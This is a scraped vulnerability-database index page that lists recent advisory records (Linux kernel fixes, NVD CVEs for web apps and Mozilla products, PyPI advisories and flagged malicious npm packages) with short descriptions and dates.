Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
ghsa-j78r-hv87-26mj (github) In the Linux kernel, the following vulnerability has been resolved: net: mdio: fix undefined beh... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-h3mh-rq8w-j65m (github) In the Linux kernel, the following vulnerability has been resolved: i2c: piix4: Fix adapter not ... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-f76m-q4g4-c63m (github) In the Linux kernel, the following vulnerability has been resolved: btrfs: fix ulist leaks in er... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-8p4q-63f6-rqfp (github) In the Linux kernel, the following vulnerability has been resolved: block: Fix possible memory l... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-8p4g-7vvj-g5r6 (github) In the Linux kernel, the following vulnerability has been resolved: mISDN: fix possible memory l... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-8fmx-5gmc-pfcw (github) In the Linux kernel, the following vulnerability has been resolved: net/smc: Fix possible leaked... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-7m6j-5mcx-6jmq (github) In the Linux kernel, the following vulnerability has been resolved: ipv6: fix WARNING in ip6_rou... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-6xrp-v9gf-f7mv (github) In the Linux kernel, the following vulnerability has been resolved: fscrypt: stop using keyrings... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-6mfv-xmmj-jgwf (github) In the Linux kernel, the following vulnerability has been resolved: ipvs: fix WARNING in ip_vs_a... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-52fr-53gv-g23j (github) In the Linux kernel, the following vulnerability has been resolved: fscrypt: fix keyring memory ... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-4pmq-325h-rx32 (github) In the Linux kernel, the following vulnerability has been resolved: ibmvnic: Free rwi on reset s... 2025-05-01T15:31:52Z 2025-05-01T15:31:52Z
ghsa-xxgf-mjgq-w636 (github) In the Linux kernel, the following vulnerability has been resolved: media: meson: vdec: fix poss... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-wxgf-7f8j-hr6j (github) In the Linux kernel, the following vulnerability has been resolved: capabilities: fix potential ... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-w9wh-q8v9-3rwf (github) In the Linux kernel, the following vulnerability has been resolved: ring-buffer: Check for NULL ... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-w77p-v2rp-vmv8 (github) In the Linux kernel, the following vulnerability has been resolved: arm64: entry: avoid kprobe r... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-vq36-qmwm-crh2 (github) In the Linux kernel, the following vulnerability has been resolved: ACPI: APEI: Fix integer over... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-vm29-jh4p-x8cp (github) In the Linux kernel, the following vulnerability has been resolved: cxl/region: Fix decoder allo... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-v832-47wf-r9vp (github) In the Linux kernel, the following vulnerability has been resolved: net: gso: fix panic on frag_... 2025-05-01T15:31:50Z 2025-05-01T15:31:51Z
ghsa-p39f-f66f-x437 (github) In the Linux kernel, the following vulnerability has been resolved: bpf, verifier: Fix memory le... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-h8g4-6mrj-mfm8 (github) In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Fix the sk->sk... 2025-05-01T15:31:50Z 2025-05-01T15:31:51Z
ghsa-fw2p-r2v5-6jjq (github) In the Linux kernel, the following vulnerability has been resolved: wifi: cfg80211: fix memory l... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-crgv-wqmc-m2wr (github) In the Linux kernel, the following vulnerability has been resolved: KVM: Reject attempts to cons... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-c8r4-j2q4-mjgj (github) In the Linux kernel, the following vulnerability has been resolved: bpftool: Fix NULL pointer de... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-c2p4-prc5-v3mc (github) In the Linux kernel, the following vulnerability has been resolved: cxl/region: Fix cxl_region l... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-8ww3-pfqc-q6wm (github) In the Linux kernel, the following vulnerability has been resolved: x86/tdx: Panic on bad config... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-8w66-gh7h-jgjh (github) In the Linux kernel, the following vulnerability has been resolved: cxl/region: Fix region HPA o... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-82pr-9mpc-vgv5 (github) In the Linux kernel, the following vulnerability has been resolved: ext4: fix BUG_ON() when dire... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-6qgr-97mx-84hr (github) In the Linux kernel, the following vulnerability has been resolved: ext4: fix warning in 'ext4_d... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
ghsa-5q7j-4fw2-f268 (github) In the Linux kernel, the following vulnerability has been resolved: HID: hyperv: fix possible me... 2025-05-01T15:31:50Z 2025-05-01T15:31:51Z
ghsa-4m85-4x3p-6jmv (github) In the Linux kernel, the following vulnerability has been resolved: KVM: Initialize gfn_to_pfn_c... 2025-05-01T15:31:51Z 2025-05-01T15:31:51Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2023-52529 (NVD) N/A HID: sony: Fix a potential memory leak in sony_probe() Linux
Linux
 Linux
Linux
 2024-03-02T21:52:34.217Z 2025-05-04T12:49:11.636Z
cve-2023-52525 (NVD) N/A wifi: mwifiex: Fix oob check condition in mwifiex_process_rx_packet Linux
Linux
 Linux
Linux
 2024-03-02T21:52:31.638Z 2025-05-04T12:49:10.564Z
cve-2023-52524 (NVD) N/A net: nfc: llcp: Add lock when modifying device list Linux
Linux
 Linux
Linux
 2024-03-02T21:52:30.995Z 2025-05-04T12:49:09.323Z
cve-2023-52515 (NVD) N/A RDMA/srp: Do not call scsi_done() from srp_abort() Linux
Linux
 Linux
Linux
 2024-03-02T21:52:25.863Z 2025-05-04T12:49:08.091Z
cve-2023-52494 (NVD) N/A bus: mhi: host: Add alignment check for event ring read pointer Linux
Linux
 Linux
Linux
 2024-02-29T15:52:11.674Z 2025-05-04T12:49:06.871Z
cve-2023-52490 (NVD) N/A mm: migrate: fix getting incorrect page mapping during page migration Linux
Linux
 Linux
Linux
 2024-02-29T15:52:09.281Z 2025-05-04T12:49:05.713Z
cve-2023-52463 (NVD) N/A efivarfs: force RO when remounting if SetVariable is not supported Linux
Linux
 Linux
Linux
 2024-02-23T14:46:23.537Z 2025-05-04T12:49:04.560Z
cve-2023-52457 (NVD) N/A serial: 8250: omap: Don't skip resource freeing if pm_runtime_resume_and_get() failed Linux
Linux
 Linux
Linux
 2024-02-23T14:46:19.772Z 2025-05-04T12:49:03.340Z
cve-2023-52452 (NVD) N/A bpf: Fix accesses to uninit stack slots Linux
Linux
 Linux
Linux
 2024-02-22T16:21:43.094Z 2025-05-04T12:49:02.146Z
cve-2023-52439 (NVD) N/A uio: Fix use-after-free in uio_open Linux
Linux
 Linux
Linux
 2024-02-20T18:34:49.323Z 2025-05-04T12:49:00.841Z
cve-2023-52433 (NVD) N/A netfilter: nft_set_rbtree: skip sync GC for new elements in this transaction Linux
Linux
 Linux
Linux
 2024-02-20T12:52:56.753Z 2025-05-04T12:48:59.453Z
cve-2022-49931 (NVD) N/A IB/hfi1: Correctly move list in sc_disable() Linux
Linux
 Linux
Linux
 2025-05-01T14:11:08.135Z 2025-05-04T12:45:29.516Z
cve-2022-49921 (NVD) N/A net: sched: Fix use after free in red_enqueue() Linux
Linux
 Linux
Linux
 2025-05-01T14:11:00.309Z 2025-05-04T12:45:28.463Z
cve-2022-49919 (NVD) N/A netfilter: nf_tables: release flow rule object from commit path Linux
Linux
 Linux
Linux
 2025-05-01T14:10:58.779Z 2025-05-04T12:45:27.331Z
cve-2022-49916 (NVD) N/A rose: Fix NULL pointer dereference in rose_send_frame() Linux
Linux
 Linux
Linux
 2025-05-01T14:10:56.851Z 2025-05-04T12:45:26.225Z
cve-2022-49909 (NVD) N/A Bluetooth: L2CAP: fix use-after-free in l2cap_conn_del() Linux
Linux
 Linux
Linux
 2025-05-01T14:10:52.331Z 2025-05-04T12:45:25.157Z
cve-2022-49904 (NVD) N/A net, neigh: Fix null-ptr-deref in neigh_table_clear() Linux
Linux
 Linux
Linux
 2025-05-01T14:10:48.998Z 2025-05-04T12:45:24.097Z
cve-2022-49892 (NVD) N/A ftrace: Fix use-after-free for dynamic ftrace_ops Linux
Linux
 Linux
Linux
 2025-05-01T14:10:35.815Z 2025-05-04T12:45:22.963Z
cve-2022-49889 (NVD) N/A ring-buffer: Check for NULL cpu_buffer in ring_buffer_wake_waiters() Linux
Linux
 Linux
Linux
 2025-05-01T14:10:33.832Z 2025-05-04T12:45:21.932Z
cve-2022-49877 (NVD) N/A bpf, sockmap: Fix the sk->sk_forward_alloc warning of sk_stream_kill_queues Linux
Linux
 Linux
Linux
 2025-05-01T14:10:25.682Z 2025-05-04T12:45:20.880Z
cve-2022-49872 (NVD) N/A net: gso: fix panic on frag_list with mixed head alloc types Linux
Linux
 Linux
Linux
 2025-05-01T14:10:22.402Z 2025-05-04T12:45:19.624Z
cve-2022-49863 (NVD) N/A can: af_can: fix NULL pointer dereference in can_rx_register() Linux
Linux
 Linux
Linux
 2025-05-01T14:10:16.403Z 2025-05-04T12:45:18.495Z
cve-2022-49862 (NVD) N/A tipc: fix the msg->req tlv len check in tipc_nl_compat_name_table_dump_header Linux
Linux
 Linux
Linux
 2025-05-01T14:10:15.742Z 2025-05-04T12:45:17.323Z
cve-2022-49851 (NVD) N/A riscv: fix reserved memory setup Linux
Linux
 Linux
Linux
 2025-05-01T14:10:06.274Z 2025-05-04T12:45:16.054Z
cve-2022-49809 (NVD) N/A net/x25: Fix skb leak in x25_lapb_receive_frame() Linux
Linux
 Linux
Linux
 2025-05-01T14:09:34.853Z 2025-05-04T12:45:15.015Z
cve-2022-49801 (NVD) N/A tracing: Fix memory leak in tracing_read_pipe() Linux
Linux
 Linux
Linux
 2025-05-01T14:09:29.682Z 2025-05-04T12:45:13.899Z
cve-2022-49748 (NVD) N/A perf/x86/amd: fix potential integer overflow on shift of a int Linux
Linux
 Linux
Linux
 2025-03-27T16:42:57.784Z 2025-05-04T12:45:12.800Z
cve-2022-49713 (NVD) N/A usb: dwc2: Fix memory leak in dwc2_hcd_init Linux
Linux
 Linux
Linux
 2025-02-26T02:24:29.566Z 2025-05-04T12:45:11.539Z
cve-2022-49708 (NVD) N/A ext4: fix bug_on ext4_mb_use_inode_pa Linux
Linux
 Linux
Linux
 2025-02-26T02:24:26.142Z 2025-05-04T12:45:10.177Z
cve-2022-49696 (NVD) N/A tipc: fix use-after-free Read in tipc_named_reinit Linux
Linux
 Linux
Linux
 2025-02-26T02:24:18.198Z 2025-05-04T12:45:08.703Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Base Score Description Vendor Product Publish Date Update Date
cve-2025-4112 (NVD) PHPGurukul Student Record System add-course.php sql injection PHPGurukul
 Student Record System
 2025-04-30T11:00:08.428Z 2025-04-30T15:32:57.086Z
cve-2025-4111 (NVD) PHPGurukul Pre-School Enrollment System visitor-details.php sql injection PHPGurukul
 Pre-School Enrollment System
 2025-04-30T10:31:07.547Z 2025-04-30T15:51:43.715Z
cve-2025-4110 (NVD) PHPGurukul Pre-School Enrollment System edit-teacher.php sql injection PHPGurukul
 Pre-School Enrollment System
 2025-04-30T10:31:04.856Z 2025-04-30T16:06:24.419Z
cve-2025-4109 (NVD) PHPGurukul Pre-School Enrollment System edit-subadmin.php sql injection PHPGurukul
 Pre-School Enrollment System
 2025-04-30T10:00:10.076Z 2025-04-30T16:22:13.615Z
cve-2025-4108 (NVD) PHPGurukul Student Record System add-subject.php sql injection PHPGurukul
 Student Record System
 2025-04-30T10:00:06.958Z 2025-04-30T16:25:35.336Z
cve-2025-4100 (NVD) Nautic Pages <= 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode stur
 Nautic Pages
 2025-05-01T06:40:15.546Z 2025-05-01T14:39:28.807Z
cve-2025-4099 (NVD) List Children <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode theandystratton
 List Children
 2025-05-01T04:22:56.550Z 2025-05-01T13:19:30.257Z
cve-2025-4095 (NVD) CVSS-v4.0: 4.3 Registry Access Management (RAM) policies not applied when sign-in enforcement is configured via a configuration profile Docker
 Docker Desktop
 2025-04-29T17:16:16.894Z 2025-04-29T18:00:02.591Z
cve-2025-4093 (NVD) N/A Memory safety bug present in Firefox ESR 128.9, and Thunderbird 128.9. This bug showed evidence of memory corruption and we presume that with enough effort this could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 128.10 and Thunderbird < 128.10. Mozilla
Mozilla
 Firefox ESR
Thunderbird
 2025-04-29T13:13:50.917Z 2025-05-01T14:22:04.123Z
cve-2025-4092 (NVD) N/A Memory safety bugs present in Firefox 137 and Thunderbird 137. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:49.479Z 2025-04-29T15:36:14.382Z
cve-2025-4091 (NVD) N/A Memory safety bugs present in Firefox 137, Thunderbird 137, Firefox ESR 128.9, and Thunderbird 128.9. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Thunderbird
Thunderbird
 2025-04-29T13:13:48.089Z 2025-05-01T14:22:03.788Z
cve-2025-4090 (NVD) N/A A vulnerability existed in Thunderbird for Android where potentially sensitive library locations were logged via Logcat. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:46.677Z 2025-05-01T14:22:03.513Z
cve-2025-4089 (NVD) N/A Due to insufficient escaping of special characters in the "copy as cURL" feature, an attacker could trick a user into using this command, potentially leading to local code execution on the user's system. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:45.152Z 2025-04-30T03:56:31.921Z
cve-2025-4088 (NVD) N/A A security vulnerability in Thunderbird allowed malicious sites to use redirects to send credentialed requests to arbitrary endpoints on any site that had invoked the Storage Access API. This enabled potential Cross-Site Request Forgery attacks across origins. This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:43.684Z 2025-05-01T14:22:03.157Z
cve-2025-4087 (NVD) N/A A vulnerability was identified in Thunderbird where XPath parsing could trigger undefined behavior due to missing null checks during attribute access. This could lead to out-of-bounds read access and potentially, memory corruption. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Thunderbird < 138, and Thunderbird < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Thunderbird
Thunderbird
 2025-04-29T13:13:42.302Z 2025-05-01T14:22:02.858Z
cve-2025-4086 (NVD) N/A A specially crafted filename containing a large number of encoded newline characters could obscure the file's extension when displayed in the download dialog. *This bug only affects Thunderbird for Android. Other versions of Thunderbird are unaffected.* This vulnerability affects Firefox < 138 and Thunderbird < 138. Mozilla
Mozilla
 Firefox
Thunderbird
 2025-04-29T13:13:40.899Z 2025-05-01T14:22:02.525Z
cve-2025-4083 (NVD) N/A A process isolation vulnerability in Thunderbird stemmed from improper handling of javascript: URIs, which could allow content to execute in the top-level document's process instead of the intended frame, potentially enabling a sandbox escape. This vulnerability affects Firefox < 138, Firefox ESR < 128.10, Firefox ESR < 115.23, Thunderbird < 138, and Thunderbird < 128.10. Mozilla
Mozilla
Mozilla
Mozilla
Mozilla
 Firefox
Firefox ESR
Firefox ESR
Thunderbird
Thunderbird
 2025-04-29T13:13:36.578Z 2025-05-01T14:22:01.318Z
cve-2025-4080 (NVD) PHPGurukul Online Nurse Hiring System view-request.php sql injection PHPGurukul
 Online Nurse Hiring System
 2025-04-29T19:31:09.233Z 2025-04-29T19:50:12.095Z
cve-2025-4079 (NVD) PCMan FTP Server RENAME Command buffer overflow PCMan
 FTP Server
 2025-04-29T18:31:07.152Z 2025-04-29T19:10:47.881Z
cve-2025-4078 (NVD) Wangshen SecGate 3600 g=log_export_file path traversal Wangshen
 SecGate 3600
 2025-04-29T20:08:01.910Z 2025-04-29T20:21:40.470Z
cve-2025-4077 (NVD) code-projects School Billing System searchrec stack-based overflow code-projects
 School Billing System
 2025-04-29T18:00:08.696Z 2025-04-29T18:23:14.738Z
cve-2025-4076 (NVD) LB-LINK BL-AC3600 Password lighttpd.cgi easy_uci_set_option_string_0 command injection LB-LINK
 BL-AC3600
 2025-04-29T18:00:06.757Z 2025-04-29T18:52:45.489Z
cve-2025-4075 (NVD) VMSMan login.php cross site scripting n/a
 VMSMan
 2025-04-29T17:31:06.488Z 2025-04-29T17:43:08.591Z
cve-2025-4074 (NVD) PHPGurukul Curfew e-Pass Management System pass-bwdates-report.php sql injection PHPGurukul
 Curfew e-Pass Management System
 2025-04-29T17:31:05.306Z 2025-04-29T17:51:05.177Z
cve-2025-4073 (NVD) PHPGurukul Student Record System change-password.php sql injection PHPGurukul
 Student Record System
 2025-04-29T17:00:08.009Z 2025-04-29T18:31:48.454Z
cve-2025-4072 (NVD) PHPGurukul Online Nurse Hiring System edit-nurse.php sql injection PHPGurukul
 Online Nurse Hiring System
 2025-04-29T16:31:04.915Z 2025-04-29T18:32:32.669Z
cve-2025-4071 (NVD) PHPGurukul COVID19 Testing Management System test-details.php sql injection PHPGurukul
 COVID19 Testing Management System
 2025-04-29T16:00:09.316Z 2025-04-29T17:58:57.197Z
cve-2025-4070 (NVD) PHPGurukul Rail Pass Management System changeimage.php sql injection PHPGurukul
 Rail Pass Management System
 2025-04-29T16:00:06.364Z 2025-04-29T17:59:44.224Z
cve-2025-4069 (NVD) code-projects Product Management System add_item stack-based overflow code-projects
 Product Management System
 2025-04-29T15:31:06.405Z 2025-04-29T17:48:56.628Z
cve-2025-4068 (NVD) code-projects Simple Movie Ticket Booking System changeprize stack-based overflow code-projects
 Simple Movie Ticket Booking System
 2025-04-29T15:31:04.352Z 2025-04-29T15:57:26.952Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
pysec-2024-87 A vulnerability was found in MicroPython 1.23.0. It has been rated as critical. Affected by this ... 2024-09-17T19:15:00+00:00 2024-09-23T21:22:09.445188+00:00
pysec-2024-86 Wagtail is an open source content management system built on Django. A bug in Wagtail's `parse_qu... 2024-07-11T16:15:00+00:00 2024-09-19T19:20:17.668744+00:00
pysec-2024-72 LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resou... 2024-08-20T15:15:00Z 2024-09-18T07:04:07.042699Z
pysec-2024-81 An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the Mind... 2024-09-12T13:15:00+00:00 2024-09-16T19:20:05.004524+00:00
pysec-2024-80 An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the Mind... 2024-09-12T13:15:00+00:00 2024-09-16T19:20:04.922906+00:00
pysec-2024-79 An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the Mind... 2024-09-12T13:15:00+00:00 2024-09-16T19:20:04.841635+00:00
pysec-2024-78 An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the Mind... 2024-09-12T13:15:00+00:00 2024-09-16T19:20:04.697678+00:00
pysec-2024-77 An arbitrary code execution vulnerability exists in versions 23.10.3.0 up to 24.7.4.1 of the Mind... 2024-09-12T13:15:00+00:00 2024-09-16T19:20:04.616691+00:00
pysec-2024-76 An XML External Entity (XXE) vulnerability in the ebookmeta.get_metadata function of ebookmeta be... 2024-06-07T19:15:00+00:00 2024-09-13T21:22:04.531357+00:00
pysec-2024-75 Twisted is an event-based framework for internet applications, supporting Python 3.6+. The `twist... 2024-07-29T16:15:00+00:00 2024-09-11T19:19:18.005250+00:00
pysec-2024-71 A vulnerability in corydolphin/flask-cors up to version 4.0.1 allows the `Access-Control-Allow-Pr... 2024-08-18T19:15:00Z 2024-09-09T07:59:30.591275Z
pysec-2024-74 MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version... 2024-09-05T17:15:00+00:00 2024-09-06T15:22:53.971446+00:00
pysec-2024-73 A vulnerability in the JSON file handling of gaizhenbiao/chuanhuchatgpt version 20240410 allows a... 2024-07-31T01:15:00+00:00 2024-08-27T15:22:40.259109+00:00
pysec-2024-70 An issue was discovered in Django 5.0 before 5.0.8 and 4.2 before 4.2.15. QuerySet.values() and v... 2024-08-07T15:15:00+00:00 2024-08-07T17:22:10.804411+00:00
pysec-2024-69 An issue was discovered in Django 5.0 before 5.0.8 and 4.2 before 4.2.15. The urlize and urlizetr... 2024-08-07T15:15:00+00:00 2024-08-07T17:22:10.745844+00:00
pysec-2024-68 An issue was discovered in Django 5.0 before 5.0.8 and 4.2 before 4.2.15. The urlize() and urlize... 2024-08-07T15:15:00+00:00 2024-08-07T17:22:10.682679+00:00
pysec-2024-67 An issue was discovered in Django 5.0 before 5.0.8 and 4.2 before 4.2.15. The floatformat templat... 2024-08-07T15:15:00+00:00 2024-08-07T17:22:10.613440+00:00
pysec-2024-66 dbt enables data analysts and engineers to transform their data using the same practices that sof... 2024-07-16T23:15:00+00:00 2024-07-19T17:21:49.664320+00:00
pysec-2024-65 Roundup before 2.4.0 allows XSS via JavaScript in PDF, XML, and SVG documents. 2024-07-17T20:15:00+00:00 2024-07-17T23:22:05.024899+00:00
pysec-2024-64 Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header. 2024-07-17T20:15:00+00:00 2024-07-17T23:22:04.987078+00:00
pysec-2024-63 In Roundup before 2.4.0, classhelpers (_generic.help.html) allow XSS. 2024-07-17T20:15:00+00:00 2024-07-17T23:22:04.949977+00:00
pysec-2024-62 Versions of the package langchain-experimental from 0.0.15 and before 0.0.21 are vulnerable to Ar... 2024-07-15T05:15:00+00:00 2024-07-15T11:19:36.686972+00:00
pysec-2024-61 A Stored Cross-Site Scripting (XSS) vulnerability exists in gaizhenbiao/chuanhuchatgpt version 20... 2024-07-11T11:15:00+00:00 2024-07-12T21:33:00.657381+00:00
pysec-2024-60 A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` f... 2024-07-07T18:15:00+00:00 2024-07-11T17:21:37.216928+00:00
pysec-2024-59 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. get_supported_language_... 2024-07-10T05:15:00+00:00 2024-07-10T11:20:07.800540+00:00
pysec-2024-58 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the ... 2024-07-10T05:15:00+00:00 2024-07-10T11:20:07.704786+00:00
pysec-2024-57 An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. The django.contrib.auth... 2024-07-10T05:15:00+00:00 2024-07-10T11:20:07.604887+00:00
pysec-2024-56 An issue was discovered in Django 4.2 before 4.2.14 and 5.0 before 5.0.7. urlize and urlizetrunc ... 2024-07-10T05:15:00+00:00 2024-07-10T11:20:07.495359+00:00
pysec-2024-54 CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Ana... 2024-06-24T18:15:00+00:00 2024-06-26T19:19:24.981233+00:00
pysec-2024-53 langchain_experimental (aka LangChain Experimental) before 0.0.61 for LangChain provides Python R... 2024-06-16T15:15:00+00:00 2024-06-16T17:20:32.187558+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-4136 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4135 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4134 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4133 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4132 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4131 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4130 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4129 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4128 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4127 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4126 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4125 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4124 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4123 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4122 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4121 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4120 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4119 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4118 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4117 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4116 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4115 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4114 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4113 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4112 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4111 The format of the source doesn't require a description, click on the link for more details
gsd-2024-21793 The format of the source doesn't require a description, click on the link for more details
gsd-2024-32761 The format of the source doesn't require a description, click on the link for more details
gsd-2024-32049 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33524 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
mal-2024-8499 Malicious code in @diotoborg/officia-labore (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8498 Malicious code in @diotoborg/officia-iste (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8456 Malicious code in @diotoborg/nemo-voluptatibus (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8449 Malicious code in @diotoborg/necessitatibus-at (npm) 2024-09-02T01:42:14Z 2024-09-02T01:42:14Z
mal-2024-8448 Malicious code in @diotoborg/natus-similique-nemo (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8419 Malicious code in @diotoborg/maxime-quisquam (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8403 Malicious code in @diotoborg/libero-asperiores-at (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8402 Malicious code in @diotoborg/laudantium-numquam (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8382 Malicious code in @diotoborg/itaque-asperiores (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8367 Malicious code in @diotoborg/inventore-amet (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8354 Malicious code in @diotoborg/illo-amet-architecto (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8329 Malicious code in @diotoborg/explicabo-optio (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8328 Malicious code in @diotoborg/explicabo-nam-iste (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8327 Malicious code in @diotoborg/explicabo-laboriosam-maxime (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8278 Malicious code in @diotoborg/earum-eum-doloribus (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8267 Malicious code in @diotoborg/ducimus-eveniet (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8261 Malicious code in @diotoborg/dolorum-ipsam (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8253 Malicious code in @diotoborg/dolores-voluptates (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8246 Malicious code in @diotoborg/doloremque-tempore-harum (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8241 Malicious code in @diotoborg/dolore-odio-est (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8190 Malicious code in @diotoborg/corporis-optio-tenetur (npm) 2024-09-02T01:42:13Z 2024-09-02T01:42:14Z
mal-2024-8141 Malicious code in @diotoborg/asperiores-maiores-velit (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8135 Malicious code in @diotoborg/aperiam-pariatur (npm) 2024-09-02T01:42:14Z 2024-09-02T01:42:14Z
mal-2024-8109 Malicious code in @diotoborg/ad-rerum (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8103 Malicious code in @diotoborg/accusamus-nam (npm) 2024-09-02T01:42:14Z 2024-09-02T01:42:14Z
mal-2024-8101 Malicious code in @diotoborg/ab-harum (npm) 2024-09-02T01:42:12Z 2024-09-02T01:42:14Z
mal-2024-8703 Malicious code in @diotoborg/voluptatum-quae (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:13Z
mal-2024-8701 Malicious code in @diotoborg/voluptatibus-officiis (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:13Z
mal-2024-8688 Malicious code in @diotoborg/vero-sit-doloribus (npm) 2024-09-02T01:42:11Z 2024-09-02T01:42:13Z
